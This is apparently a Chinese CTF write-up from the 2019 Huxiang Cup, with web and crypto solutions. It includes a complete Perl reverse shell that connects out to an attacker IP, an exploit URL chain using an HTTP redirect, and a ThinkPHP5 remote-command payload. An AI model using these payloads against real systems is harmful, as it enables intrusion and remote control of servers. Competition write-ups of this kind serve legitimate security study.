2019湖湘杯

Posted on

前言

湖湘杯抢钱大赛,drl

Web

untar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
    $sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
    echo $sandbox."</br>";
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"]))
        die();
    $url  = str_replace("|", "", $_GET["url"]);
    $data = shell_exec("GET " . escapeshellarg($url));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
    highlight_file(__FILE__);

与2017 hicton ssrfme类似,但是这里只能用http://或者https://,并且过滤了|,因此使用重定向绕过,参考https://www.jianshu.com/p/3f82685f56a8

找一个perl后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = 'xxx.xxx.xxx.xxx';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();    
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}


# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page;
}

将其部署到服务器上,然后访问

1
http://183.129.189.62:12507/?url=http://your_vps/backdoor.txt&filename=URI/glarcy.pm

在服务器写一个302.php

1
2
3
4
<?php
	$url="glarcy://glarcy.com";
	header("Location: $url");
?>

访问?filename=xxx&url=http://your_vps/302.php,成功反弹shell

h1

执行readflag拿到flag

h2

Thinkphp?

Thinkphp5 rce

1
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

crypto

give me your passport

简单aes,使用题目给出的附件直接生成Admin的cipher,然后提交

h3

Rsa

已知dp、n、e、c求m,使用网上现成的脚本https://github.com/Zui-Qing-Feng/RSA/blob/master/%E5%B7%B2%E7%9F%A5e%2Cn%2Cdp%2Cc%E6%B1%82m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/python  
# coding:utf-8

import gmpy2
from Crypto.Util.number import long_to_bytes

dp = 84373069210173690047629226878686144017052129353931011112880892379361035492516066159394115482289291025932915787077633999791002846189004408043685986856359812230222233165493645074459765748901898518115384084258143483508823079115319711227124403284267559950883054402576935436305927705016459382628196407373896831725
n = 22000596569856085362623019573995240143720890380678581299411213688857584612953014122879995808816872221032805734151343458921719334360194024890377075521680399678533655114261000716106870610083356478621445541840124447459943322577740268407217950081217130055057926816065068275999620502766866379465521042298370686053823448099778572878765782711260673185703889168702746195779250373642505375725925213796848495518878490786035363094086520257020021547827073768598600151928787434153003675096254792245014217044607440890694190989162318846104385311646123343795149489946251221774030484424581846841141819601874562109228016707364220840611
e = 65537
c = 14874271064669918581178066047207495551570421575260298116038863877424499500626920855863261194264169850678206604144314318171829367575688726593323863145664241189167820996601561389159819873734368810449011761054668595565217970516125181240869998009561140277444653698278073509852288720276008438965069627886972839146199102497874818473454932012374251932864118784065064885987416408142362577322906063320726241313252172382519793691513360909796645028353257317044086708114163313328952830378067342164675055195428728335222242094290731292113709866489975077052604333805889421889967835433026770417624703011718120347415460385182429795735
for i in range(1, 65538):
    if (dp * e - 1) % i == 0:
        if n % (((dp * e - 1) / i) + 1) == 0:
            p = ((dp * e - 1) / i) + 1
            q = n / (((dp * e - 1) / i) + 1)
            phi = (p - 1) * (q - 1)
            d = gmpy2.invert(e, phi) % phi
            m = pow(c, d, n)
            print long_to_bytes(m)

Des

子密钥反推deskey,参考

https://skysec.top/2017/12/25/%E4%B8%80%E9%81%93%E6%9C%89%E5%85%B3%E5%AF%86%E9%92%A5%E7%BC%96%E6%8E%92%E7%9A%84DES%E9%A2%98%E7%9B%AE/#%E7%94%B1%E5%AD%90%E5%AF%86%E9%92%A5%E5%8F%8D%E6%8E%A8deskey

脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
Kn = [
    '101000001001011001000110001110110000011110011000',
    '111000000011011001010010100101100011011000100110',
    '011001001101011001110000001111000000101111100100',
    '110001101101000101010010000100001110100011010011',
    '001011101100001101010011011001111010010000010001',
    '001011110101000100001011101010110010010101001010',
    '001010110000000111011001001011001101001100000110',
    '000111010100100010011001010101000100010011100110',
    '000111010100100111001000010000001111100101010100',
    '000100100110100110001101011000011010010010111000',
    '000110010010110100000101111010010001110000001011',
    '010000010010110010101101000011100101001000111110',
    '110100011010010010100100000101010101100111100100',
    '110100001000111010100010100000001000100011110001',
    '111100001011001000100110110000111010111000010101',
    '101000001011111000100110101000011001001000001011'
]

key1 = '101000001001011001000110001110110000011110011000'
__pc2 = [
      13, 16, 10, 23,  0,  4,
       2, 27, 14,  5, 20,  9,
      22, 18, 11,  3, 25,  7,
      15,  6, 26, 19, 12,  1,
      40, 51, 30, 36, 46, 54,
      29, 39, 50, 44, 32, 47,
      43, 48, 38, 55, 33, 52,
      45, 41, 49, 35, 28, 31
   ]
C1D1 = ['*']*56
for i in range(0,len(key1)):
    C1D1[__pc2[i]] = key1[i]
# print "C1: "+"".join(C1D1)[:28]
# print "D1: "+"".join(C1D1)[28:]

C0 = '000000001*11111100*110*00*00'
D0 = '1011001*01*1101*0001011000*0'


__pc1 = [56, 48, 40, 32, 24, 16, 8,
         0, 57, 49, 41, 33, 25, 17,
         9, 1, 58, 50, 42, 34, 26,
         18, 10, 2, 59, 51, 43, 35,
         62, 54, 46, 38, 30, 22, 14,
         6, 61, 53, 45, 37, 29, 21,
         13, 5, 60, 52, 44, 36, 28,
         20, 12, 4, 27, 19, 11, 3
         ]
C0D0 = C0+D0
res = ['*']*64
deskey = ""
for i in range(0,len(__pc1)):
    res[__pc1[i]] = C0D0[i]
for i in res:
    deskey += i
# print deskey

#deskey: 01000***01**111*0100100*0110010*0110111*01*00*1*0*0*010*0100001*

def zuoyiwei(str,num):
    my = str[num:len(str)]
    my = my+str[0:num]
    return my
def key_change_1(str):
    key1_list = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
    res = ""
    for i in key1_list:
        res+=str[i-1]
    return res

def key_change_2(str):
    key2_list = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
    res = ""
    for i in key2_list:
        res+=str[i-1]
    return res
def key_gen(str):
    key_list = []
    key_change_res = key_change_1(str)
    key_c = key_change_res[0:28]
    key_d = key_change_res[28:]
    for i in range(1,17):
        if (i==1) or (i==2) or (i==9) or (i==16):
            key_c = zuoyiwei(key_c,1)
            key_d = zuoyiwei(key_d,1)
        else:
            key_c = zuoyiwei(key_c,2)
            key_d = zuoyiwei(key_d,2)
        key_yiwei = key_c+key_d
        key_res = key_change_2(key_yiwei)
        key_list.append(key_res)
    return key_list
key = "01000abc01de111f0100100g0110010h0110111i01j00k1l0m0n010o0100001p"
# print key_gen(key)
#
unknow = ['101000001001011001000110001110110000011110011000',
          '1j1n000000d101100m010010100k011000110110be1a0110',
          '01100100jm010d10011100000011110ae00010111110010b',
          '1d0001101101000m01010nj0000100b011k01e0011010011',
          '00j01110d10000110101001m01k0e1111010010b00010a01',
          '0010111m0101000100n010d1101010110e100101a10010k0',
          'n0d0101100000001m10j10010b101k00110100110000011a',
          '000m1j01010010n010011001e10101a0010001001k10b110',
          '00n111010100m00j1d0010000k00000e11111b01010101a0',
          '000100100dm010011000110j0110ba01101001001011k000',
          '0001100j00101m0d000n0101111010010b0k11000a001e11',
          '0m000n0100101100j010110d00001110a1010010e0k11110',
          '110j00ndm010010010100100b00101010101ka011110010e',
          '1101n00010001110d01000m01000a0e0100010b0111k0001',
          '11md0000101100100010nj10110b001k1a10111e00010101',
          '10100000101mdj10n010011010100e011001a0k000001b11'
]

# def check(s):
#     count = 0
#     ini = 1
#     for i in range(16):
#         if s in unknow[i]:
#             count += 1
#             try:
#                 assert Kn[i][unknow[i].index(s)] == "1"
#             except:
#                 ini = 0
#                 break
#     if count == 0:
#         print s + ":unknow"
#     elif ini == 1:
#         print s + ":1"
#     else:
#         print s + ":0"
#
# for x in "abcdefghijklmnop":
#     check(x)

undeskey = "0100000c0110111f0100100g0110010h0110111i0110011l0100010o0100001p"

def bintostr(str):
    res = ""
    for i in range(0,len(str),8):
        res += chr(int(str[i:i+8],2))
    return res

for c in "01":
    for f in "01":
        for g in "01":
            for h in "01":
                for i in "01":
                    for l in "01":
                        for o in "01":
                            for p in "01":
                                deskey = "0100000"+c+"0110111"+f+"0100100"+g+"0110010"+h+"0110111"+i+"0110011"+l+"0100010"+o+"0100001"+p
                                deskey = bintostr(deskey)
                                print deskey

得到无数个key,并且解密的结果都相同,最后在key中找到AnHengDB, 拼接得到flag

h4

决赛感悟

第一次打湖湘杯决赛,长沙的食物太辣了,天气也很冷,住的挺好,但是起床时间太早了,俺就是一名网络水军。